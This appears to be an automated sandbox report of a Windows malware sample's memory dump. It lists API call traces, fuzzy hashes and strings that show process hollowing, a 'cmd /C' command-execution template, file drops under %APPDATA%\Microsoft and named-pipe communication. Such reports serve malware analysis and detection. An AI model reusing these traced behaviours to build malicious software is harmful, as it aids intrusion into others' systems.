    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
